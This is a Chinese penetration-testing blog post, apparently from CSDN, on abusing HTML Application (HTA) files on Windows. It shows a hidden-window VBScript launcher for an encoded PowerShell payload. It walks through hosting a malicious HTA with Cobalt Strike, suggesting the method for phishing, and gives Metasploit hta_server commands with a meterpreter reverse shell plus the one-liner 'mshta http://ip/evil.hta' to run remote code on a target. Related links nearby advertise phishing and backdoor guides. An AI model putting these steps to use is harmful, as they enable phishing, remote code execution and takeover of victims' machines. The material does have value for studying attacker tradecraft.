HTA(html应用程序)攻击

最新推荐文章于 2023-03-25 19:17:00 发布
最新推荐文章于 2023-03-25 19:17:00 发布
阅读量3.5k 收藏 10
点赞数 2
分类专栏: 渗透测试 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/113983549
版权
HTA 介绍

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别

大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的

HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)

HTA 简单用法

可双击运行hta应用或命令窗口mshta.exe解析执行

<script>
	hta = new ActiveXObject("WScript.Shell");
	hta.run("%windir%\\System32\\cmd.exe /c calc.exe", 0);  
	window.close();
</script>

保存为HTA文件后就可以打开 执行后会弹出计算器
在这里插入图片描述

CS中利用

生成一个远端HTA恶意脚本
在这里插入图片描述
设置监听器
Method(payload)建议使用powershell,担心部分系统版本不兼容
在这里插入图片描述
HTML应用文件生成好后,来到Attacks --> Web Drive-by --> Host File,选择刚才生成的文件,最后点击Launch,复制CS创建的链接,在目标主机上打开此链接
在这里插入图片描述
在这里插入图片描述
浏览器访问链接即可下载该hta文件,这种方式也可用于钓鱼
在这里插入图片描述
也可以在目标机器的命令行窗口上执行 mshta http://ip/evil.hta 即可完成上线
在这里插入图片描述
默认情况下,这是以powershell作为payload的hta文件

<script language="VBScript">
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -nop -w hidden -encodedcommand [powershell脚本内容], 0, true
	End Function

	var_func
	self.close
</script>
MSF中利用
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_http
set lhost ip
set lport 监听端口
exploit -j

在这里插入图片描述
同样,在目标机器的命令行窗口上执行 mshta http://ip/evil.hta 即可完成上线
在这里插入图片描述
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTA小程序
05-29
个人小程序 初学者 请多多关照
HTA数据库操作
12-29
hta中使用VBScript操作access数据库文件mdb,方便直观,代码简洁。适合新手入门,可转ASP。
另一种可执行文件--hta文件.zip
11-21
html制作成exe
jingxi.rar_hta_女朋友小程序
09-24
想给你女朋友一个惊喜吗?一个小程序让你实现这个愿望.粘贴到记事本里面,另存为,再把文件名的后缀名改为hta就OK了,效果自己双击就看的到,成功编辑以后,想关掉他可以按ALT+F4
modern-hta:在HTML应用程序中运行现代代码
05-10
现代人 modern-hta将和其他捆绑在一起,以在运行现代代码。 用法 使用示例hta文件。 < meta http-equiv =" x-ua-compatible " content =" ie=11 " > < script src =" https://unpkg.com/modern-hta " > import $ from './$.mjs' import data from './data.json' log ( `Hello World` ) </ script > 或者,在本地并运行。 安装 npm install modern-hta < meta http-equiv =" x-ua-compatible " content =" ie=11 " > < script src =" node_modules/modern-hta/modern-ht
Kali 渗透测试:利用HTA文件进行渗透攻击
Liu_Bruce的博客
05-13 1816
Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序HTML Application,HTA)文件就成了最好的选择。 HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通
HTA简介
qq_21178295的博客
01-20 1624
1 HTA简介 详情参考:https://baike.baidu.com/item/HTA/262732?fr=aladdin HTAHTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。 1.1 HTA属性 HTA与普通的网页结构差不多,所以设计...
什么是HTA文件?
10-04 1038
HTAHTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差别。下面是一个HTA的例子: 第一个HTA的例子 p {font-size:24;cursor:hand} HTA HTML Application HTML应用程序 把上面的代码复制到任
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2510
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]
qwsn
03-25 2327
一、后门简介 1、hta后门 2、exe后门 3、宏病毒后门 二、生成后门并测试 1、生成HTA后门并测试 2、生成exe后门并测试 3、生成宏病毒后门并测试
使用网页应用程序HTA)开发简单串口控制软件
01-23
使用网页应用程序HTA)开发简单串口控制软件 相关文档:http://blog.csdn.net/catxl313/archive/2010/01/22/5244243.aspx
hta格式程序详解
07-22
适合初学者。本学习资料仅对HTA格式的程序进行了大概的解说,可以自己创建一个HTA格式的程序
伪造蓝屏,可以伪造蓝屏不是正的.hta
10-08
伪造蓝屏可以装一装自己电脑错误,然后在自己电脑上乱按几个键,就恢复了(PS:乱按是没效果的,乱按的同时按下Alt+F4,就可以恢复正常,无乱码)
hta文件制作教程.7z
08-02
hta文件制作教程.7z
如何把html网页打包成exe可执行程序
11-24
如何把html网页打包成exe可执行程序 另一种可执行文件--hta文件 将html制作成exe 如何把html网页打包成exe可执行程序
HTA+EasyUI桌面程序
03-23
用户名密码都是admin,只做了一个fragment框架。里面的东西自己填
HTA程序
12-13
HTA程序
HTA文件去除html控件认证和接收命令行参数
09-05
最近看vbscript程序员参考手册第三版,讲到hta的两个应用
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 3992
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
hta代码中怎么使用JavaScript脚本
最新发布
05-31
HTML 中使用 JavaScript 脚本可以通过以下几种方式: 1. 在 HTML 文件中直接嵌入 JavaScript 代码: ``` <script type="text/javascript"> // JavaScript 代码 </script> ``` 2. 在 HTML 文件中引入外部 JavaScript 文件: ``` <script type="text/javascript" src="脚本文件路径"></script> ``` 3. 在 HTML 标签中使用事件属性绑定 JavaScript 代码: ``` <button onclick="javascript代码">按钮</button> ``` 4. 在 URL 中使用 JavaScript 代码: ``` <a href="javascript:javascript代码">链接</a> ``` 需要注意的是,上述方式中的 JavaScript 代码应该放在 `<script>` 标签中或者在 `href` 或事件属性中直接书写,而不是在 HTML 标签中直接书写。同时,为了避免代码冲突,建议在 JavaScript 代码中使用函数或对象等封装方式进行编写。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值